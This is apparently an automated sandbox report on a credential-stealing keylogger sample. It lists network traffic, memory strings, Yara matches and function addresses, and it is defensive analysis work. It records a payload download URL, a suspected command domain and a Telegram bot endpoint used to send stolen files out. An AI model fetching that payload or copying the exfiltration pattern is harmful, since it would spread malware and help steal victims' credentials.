Source: global traffic	HTTP traffic detected: GET /Xkqu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Xkqu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49741 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.7:49893 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Xkqu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Xkqu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: oshi.at
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: jertcot.shop

Source: InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.0000000003313000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000009.00000002.2519386578.0000000001654000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.0000000003313000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: 50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2517086009.0000000000413000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: InstallUtil.exe, 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jertcot.shop
Source: InstallUtil.exe, 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jertcot.shopd
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: InstallUtil.exe, 00000009.00000002.2520728746.0000000003352000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.000000000330D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: InstallUtil.exe, 00000009.00000002.2520728746.0000000003352000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.000000000330D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: 50201668.exe, 00000006.00000002.1412323204.0000000003241000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.0000000003313000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: InstallUtil.exe, 00000009.00000002.2520728746.00000000033DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.0000000003396000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2517086009.0000000000413000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: 50201668.exe, 00000006.00000002.1412323204.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at
Source: 50201668.exe, 00000006.00000002.1412323204.0000000003241000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oshi.at/Xkqu
Source: InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 50201668.exe, 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2517086009.0000000000413000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: InstallUtil.exe, 00000009.00000002.2520728746.0000000003335000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000D.00000002.2520170939.00000000032F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 50201668.exe, 00000006.00000002.1412323204.0000000003297000.00000004.00000800.00020000.00000000.sdmp, 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, Ticks.exe, 0000000C.00000002.1690167181.00000000031D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 50201668.exe, 00000006.00000002.1425059266.0000000006F60000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: 50201668.exe, Ticks.exe.6.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789

Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.7:49789 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.Ticks.exe.42a01d0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.Ticks.exe.42a01d0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.50201668.exe.4326a68.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.50201668.exe.4326a68.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.50201668.exe.4326a68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.50201668.exe.4326a68.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.Ticks.exe.42a01d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 12.2.Ticks.exe.42a01d0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.50201668.exe.42c19b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.50201668.exe.42c19b0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.50201668.exe.43101d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.50201668.exe.43101d0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.1421354221.00000000042C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000C.00000002.1717820262.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 50201668.exe PID: 6920, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Ticks.exe PID: 7824, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0719EBD0 NtResumeThread,	6_2_0719EBD0
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0719B2F0 NtProtectVirtualMemory,	6_2_0719B2F0
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0719EBCA NtResumeThread,	6_2_0719EBCA
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0719B2E8 NtProtectVirtualMemory,	6_2_0719B2E8
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_0703CE00 NtResumeThread,	12_2_0703CE00
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_070393A0 NtProtectVirtualMemory,	12_2_070393A0
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_0703CDF9 NtResumeThread,	12_2_0703CDF9
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_07039398 NtProtectVirtualMemory,	12_2_07039398

Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_01833170	6_2_01833170
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0183B178	6_2_0183B178
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_01833300	6_2_01833300
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0183D6A0	6_2_0183D6A0
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0183D988	6_2_0183D988
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_01833E20	6_2_01833E20
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_01837199	6_2_01837199
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_018371A8	6_2_018371A8
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0183B168	6_2_0183B168
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0183772B	6_2_0183772B
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_01837738	6_2_01837738
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06D72A20	6_2_06D72A20
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DD87E0	6_2_06DD87E0
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DDAEA8	6_2_06DDAEA8
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DD1FAB	6_2_06DD1FAB
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DDEF40	6_2_06DDEF40
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DD87D1	6_2_06DD87D1
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DD1419	6_2_06DD1419
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DD1428	6_2_06DD1428
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DDF267	6_2_06DDF267
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DD73A4	6_2_06DD73A4
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DDAE9A	6_2_06DDAE9A
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DDBBF8	6_2_06DDBBF8
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DDBBF2	6_2_06DDBBF2
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DEDCB8	6_2_06DEDCB8
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DF3E08	6_2_06DF3E08
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DFF7B0	6_2_06DFF7B0
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DF6318	6_2_06DF6318
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DF6328	6_2_06DF6328
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06DF3DF7	6_2_06DF3DF7
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E05EA8	6_2_06E05EA8
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E00040	6_2_06E00040
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E019A3	6_2_06E019A3
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E05E8D	6_2_06E05E8D
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E07C08	6_2_06E07C08
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E0DD60	6_2_06E0DD60
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E0DD51	6_2_06E0DD51
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E07BEA	6_2_06E07BEA
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E0F360	6_2_06E0F360
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06E00007	6_2_06E00007
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EFF1E0	6_2_06EFF1E0
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF7630	6_2_06EF7630
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF021A	6_2_06EF021A
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF761A	6_2_06EF761A
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EFCFC8	6_2_06EFCFC8
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF98A8	6_2_06EF98A8
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF7888	6_2_06EF7888
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF9898	6_2_06EF9898
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF7878	6_2_06EF7878
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF0040	6_2_06EF0040
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF7828	6_2_06EF7828
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06EF0006	6_2_06EF0006
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06FB0040	6_2_06FB0040
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06FB0006	6_2_06FB0006
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0719CC88	6_2_0719CC88
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_07197B28	6_2_07197B28
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_07197B18	6_2_07197B18
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0719D325	6_2_0719D325
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_07190007	6_2_07190007
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0728EA78	6_2_0728EA78
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_0728E560	6_2_0728E560
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_07270035	6_2_07270035
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_07270040	6_2_07270040
Source: C:\Users\user\Desktop\50201668.exe	Code function: 6_2_06D72A1E	6_2_06D72A1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_015CC548	9_2_015CC548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_015C2DD1	9_2_015C2DD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_015C9490	9_2_015C9490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_015CC539	9_2_015CC539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_015C947F	9_2_015C947F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_07145DCC	9_2_07145DCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_0714B650	9_2_0714B650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_071431C8	9_2_071431C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_07146C71	9_2_07146C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_07144A60	9_2_07144A60
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014AB178	12_2_014AB178
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014AD6A0	12_2_014AD6A0
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014AD988	12_2_014AD988
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014AB168	12_2_014AB168
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014A7199	12_2_014A7199
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014A71A8	12_2_014A71A8
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014A772B	12_2_014A772B
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014A7738	12_2_014A7738
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014AD69B	12_2_014AD69B
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_014AD983	12_2_014AD983
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C787E0	12_2_06C787E0
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C7AEA8	12_2_06C7AEA8
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C71FAB	12_2_06C71FAB
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C7EF40	12_2_06C7EF40
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C787D1	12_2_06C787D1
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C71419	12_2_06C71419
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C71428	12_2_06C71428
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C7F267	12_2_06C7F267
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C773A4	12_2_06C773A4
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C7AE9B	12_2_06C7AE9B
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C7BBF3	12_2_06C7BBF3
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C7BBF8	12_2_06C7BBF8
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C8DCB8	12_2_06C8DCB8
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C93E08	12_2_06C93E08
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C96318	12_2_06C96318
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C96328	12_2_06C96328
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06C93DF7	12_2_06C93DF7
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06CA5EA8	12_2_06CA5EA8
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06CA0040	12_2_06CA0040
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06CA19A3	12_2_06CA19A3
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06CA5E9F	12_2_06CA5E9F
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06CA7C08	12_2_06CA7C08
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06CA7C03	12_2_06CA7C03
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06CADD51	12_2_06CADD51
Source: C:\Users\user\AppData\Roaming\Ticks.exe	Code function: 12_2_06CADD60	12_2_06CADD60
